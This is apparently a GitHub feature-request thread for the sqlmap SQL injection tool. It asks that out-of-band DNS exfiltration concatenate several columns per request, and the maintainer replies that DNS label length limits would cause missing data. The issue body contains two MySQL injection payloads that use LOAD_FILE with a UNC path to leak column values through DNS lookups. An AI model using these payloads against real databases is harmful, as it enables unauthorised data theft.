### ISSUE TITLE
Support dump multiple columns as one column

### ISSUE THREAD

**Issue by notmd** [sqlmapproject/sqlmap#5737]
**Is your feature request related to a problem? Please describe.**
Using out-of-band technique with a very long running request, dumping 1 column at a time is very slow. 
Example payload to dump id,col1,col2, sqlmap need to perform 3 requests to dump 3 column
```
test' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT LOAD_FILE(CONCAT(0x5c5c5c5c4771772e,(SELECT HEX(MID((col1),1,31)) FROM some_table  ORDER BY id LIMIT 44,1),some_dns_hex))),9,1)) NOT BETWEEN 0 AND 605) THEN 0x74657374 ELSE 0x28 END)) AND 'uMjd'='uMjd
```

**Describe the solution you'd like**

It would be better if sqlmap can combine the column value with user provided separator. Add a `--data-separator` option. Then sqlmap just need to perform 1 request and parse the response with given separator. This might be applied to other blind techniques. Sorry the sql I write may not work but hope you get what I mean.
```
test' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT LOAD_FILE(CONCAT(0x5c5c5c5c4771772e,(HEX(MID(CONCAT(id,separator,col1, separator,col2), 1, 31)) FROM some_table  ORDER BY id LIMIT 44,1),0x_some_dns_hex))),9,1)) NOT BETWEEN 0 AND 605) THEN 0x74657374 ELSE 0x28 END)) AND 'uMjd'='uMjd
```
**Describe alternatives you've considered**
Support parallel by rows instead. Currently `--threads` option seems not work with out-of-band technique.
**Additional context**
None.

**Comment by stamparm** [comment]
there are limitations in the length of DNS labels. with concatenation of columns, you would hit that limit really fast. then, ultimately, you'll create an issue with "missing data"

**Comment by notmd** [comment]
Thank you for the answer. If I want to implement it for myself, can you point what need to be done? I'm fine with the missing data case.
